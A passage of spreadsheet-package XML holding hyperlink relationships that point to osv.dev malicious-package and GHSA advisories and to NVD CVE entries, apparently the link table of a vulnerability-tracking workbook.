Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-8m3c-c648-2xjj" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-cc9r-2j5m-2m83" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-wmmp-3585-3rmp" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId1693" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.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81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 